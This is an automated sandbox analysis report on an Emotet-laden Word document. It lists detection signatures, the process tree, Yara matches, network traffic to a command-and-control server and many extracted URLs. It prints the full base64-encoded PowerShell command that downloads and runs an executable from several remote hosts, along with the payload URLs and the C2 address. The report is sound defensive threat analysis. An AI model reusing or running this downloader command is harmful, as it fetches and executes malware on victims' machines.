Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Exploit.Siggen2.13241.24099.28027

Overview

General Information

Sample Name:SecuriteInfo.com.Exploit.Siggen2.13241.24099.28027 (renamed file extension from 28027 to doc)
Analysis ID:255747
MD5:e195f36b206d00392513fa478017b164
SHA1:a0e0048e3387b1ca5c4dfc6175d4958ab5157557
SHA256:cb62bca74d99cf663f017a96fe335ed6f7b61dc98c84b17b65184293ed02e223

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with hexadecimal encoded strings
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
Allocates a big amount of memory (probably used for heap spraying)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6896 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6992 cmdline: powersheLL -e JABaAEMAUQBEAFgAeABwAGIAPQAnAFoAWABHAE0ASwBjAHgAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAGAAUgBgAGkAVAB5AHAAcgBPAFQAYABPAEMATwBMACIAIAA9ACAAJwB0AGwAcwAxADIALAAgAHQAbABzADEAMQAsACAAdABsAHMAJwA7ACQATwBJAEcARwBJAGIAdABwACAAPQAgACcAOAA0ADkAJwA7ACQAQQBZAEsAUABVAGkAbABxAD0AJwBZAEgARgBOAEsAYwBjAG8AJwA7ACQAVwBGAEIATgBTAHMAdgBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAEkARwBHAEkAYgB0AHAAKwAnAC4AZQB4AGUAJwA7ACQAUwBIAEUAWQBRAHAAdgB1AD0AJwBDAFgARQBKAFcAZQBkAHAAJwA7ACQARgBHAFYATQBUAGgAaQBiAD0AJgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAFcARQBCAEMATABpAEUATgBUADsAJABOAFEAQwBLAE0AdwBhAHkAPQAnAGgAdAB0AHAAOgAvAC8AbgB3AGMAcwB2AGMAcwAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAHUAegA2AF8AcQBzADgAXwBxAHIALwAqAGgAdAB0AHAAOgAvAC8AbwBkAGUAcwBzAGEAcgBlAHMAbwB1AHIAYwBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwAzAF8AbwBfAGIAdQB0ADkALwAqAGgAdAB0AHAAcwA6AC8ALwBvAG4AZQBmAGEAcgBtAGQAZQBzAGkAZwBuAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AdQBfAGYAaQBnAF8AbQAyAG0AdgAvACoAaAB0AHQAcAA6AC8ALwBvAG4AZQB3AGkAdABoAHkAbwB1AGMAZAAuAGMAbwBtAC8AXwBtAG0ALwBvAGkAeABfAGsAdABjAHAAYwBfAGQAbABqAGgAcwBlAHgALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBwAGkAZQBtAG8AbgB0AGUAaQB0AGkAbgBlAHIAYQAuAG4AZQB0AC8AbgBfAGcAMgBvADQAXwBqAHUAbQBrAHQANAAvACcALgAiAHMAYABwAEwASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAUABOAFcAVgBMAGcAaABjAD0AJwBUAEsAVgBLAEgAbwBkAHQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAUABIAEgAWgBpAGMAcgAgAGkAbgAgACQATgBRAEMASwBNAHcAYQB5ACkAewB0AHIAeQB7ACQARgBHAFYATQBUAGgAaQBiAC4AIgBkAE8AdwBOAGwATwBBAGQAZgBgAEkAYABsAEUAIgAoACQARgBQAEgASABaAGkAYwByACwAIAAkAFcARgBCAE4AUwBzAHYAcwApADsAJABMAEIASABVAFQAegBhAGoAPQAnAEQATwBMAEIASgB2AHUAbgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAFcARgBCAE4AUwBzAHYAcwApAC4AIgBsAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADIAMAA3ADcAMwApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwByAGAARQBhAFQAZQAiACgAJABXAEYAQgBOAFMAcwB2AHMAKQA7ACQAWABWAFgAUgBPAHUAYwBrAD0AJwBTAFAAUQBHAEQAcQByAG4AJwA7AGIAcgBlAGEAawA7ACQAVQBVAFgAVQBDAG4AZABuAD0AJwBTAEEAQQBQAFUAbgBmAHYAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgBLAFQAWgBRAG8AcABxAD0AJwBOAEkASABLAFMAaQB1AHMAJwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 7128 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • 849.exe (PID: 5056 cmdline: C:\Users\user\849.exe MD5: 4B065D0A3A17C2F31D40A23E996A6ECD)
    • tokenbinding.exe (PID: 4564 cmdline: C:\Windows\SysWOW64\waitfor\tokenbinding.exe MD5: 4B065D0A3A17C2F31D40A23E996A6ECD)
  • svchost.exe (PID: 5732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5880 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.302494.LZD4tBHE.20200802005408.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xff:$s1: powersheLL
  • 0xfe7:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfe7:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfe7:$sn3: PowerShell
  • 0x101:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.302494.LZD4tBHE.20200802005408.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000002.1287838829.0000000002151000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000005.00000002.1540004718.0000000002280000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.1287828307.0000000002140000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000005.00000002.1540365127.00000000022A1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_022A1D9C CryptDecodeObjectEx,5_2_022A1D9C
            Source: C:\Users\user\849.exeCode function: 4_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,4_2_00401078
            Source: C:\Users\user\849.exeCode function: 4_2_00444717 lstrlenA,FindFirstFileA,FindClose,4_2_00444717
            Source: C:\Users\user\849.exeCode function: 4_2_004028E0 FindFirstFileA,FindClose,4_2_004028E0
            Source: C:\Users\user\849.exeCode function: 4_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,4_2_004390BA
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,5_2_00401078
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_00444717 lstrlenA,FindFirstFileA,FindClose,5_2_00444717
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,5_2_004047C0
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_004028E0 FindFirstFileA,FindClose,5_2_004028E0
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,5_2_004390BA
            Source: C:\Windows\SysWOW64\waitfor\tokenbinding.exeCode function: 5_2_022A28BC FindNextFileW,FindFirstFileW,FindClose,5_2_022A28BC
            Source: winword.exeMemory has grown: Private usage: 5MB later: 65MB
            Source: global trafficDNS query: name: nwcsvcs.com
            Source: global trafficTCP traffic: 192.168.2.5:49737 -> 142.105.151.124:443
            Source: global trafficTCP traffic: 192.168.2.5:49730 -> 23.235.202.92:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2404306 ET CNC Feodo Tracker Reported CnC Server TCP group 4 192.168.2.5:49737 -> 142.105.151.124:443
            Source: global trafficHTTP traffic detected: GET /cgi-bin/uz6_qs8_qr/ HTTP/1.1Host: nwcsvcs.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/ HTTP/1.1Referer: http://142.105.151.124/DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/Content-Type: multipart/form-data; boundary=---------------------------998821721308771User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 142.105.151.124:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: unknownTCP traffic detected without corresponding DNS query: 142.105.151.124
            Source: global trafficHTTP traffic detected: GET /cgi-bin/uz6_qs8_qr/ HTTP/1.1Host: nwcsvcs.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: nwcsvcs.com
            Source: unknownHTTP traffic detected: POST /DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/ HTTP/1.1Referer: http://142.105.151.124/DOVlgd/eHsHYbceyRSLyxnn/NZsywcmW1rRBnISBB/OcOwXx/y0VWVY/Content-Type: multipart/form-data; boundary=---------------------------998821721308771User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 142.105.151.124:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
            Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.drString found in binary or memory: http://nwcsvcs.com/cgi-bin/uz6_qs8_qr/
            Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.drString found in binary or memory: http://odessaresources.com/cgi-bin/3_o_but9/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
            Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.drString found in binary or memory: http://onewithyoucd.com/_mm/oix_ktcpc_dljhsex/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
            Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.drString found in binary or memory: http://www.piemonteitinera.net/n_g2o4_jumkt4/
            Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.aadrm.com/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.diagnostics.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.microsoftstream.com/api/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.onedrive.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://apis.live.net/v5.0/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://app.powerbi.com/taskpane.html
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://augloop.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
            Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://cdn.entity.
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://clients.config.office.net/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
            Source: svchost.exe, 00000003.00000002.1538719097.000001EF8E23E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://config.edge.skype.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://cortana.ai
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://cr.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://dataservice.o365filtering.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://dataservice.o365filtering.com/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://devnull.onenote.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://directory.services.
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://graph.ppe.windows.net
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://graph.ppe.windows.net/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://graph.windows.net
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://graph.windows.net/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://incidents.diagnostics.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://lifecycle.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://login.microsoftonline.com/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://login.microsoftonline.com/common
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://login.windows.local
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://management.azure.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://management.azure.com/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://messaging.office.com/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://ncus-000.contentsync.
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://officeapps.live.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://onedrive.live.com
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://onedrive.live.com/embed?
            Source: PowerShell_transcript.302494.LZD4tBHE.20200802005408.txt.1.drString found in binary or memory: https://onefarmdesign.com/cgi-bin/u_fig_m2mv/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
            Source: E0FCE65B-67D7-4CB4-9477-9154A09CCEAD.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
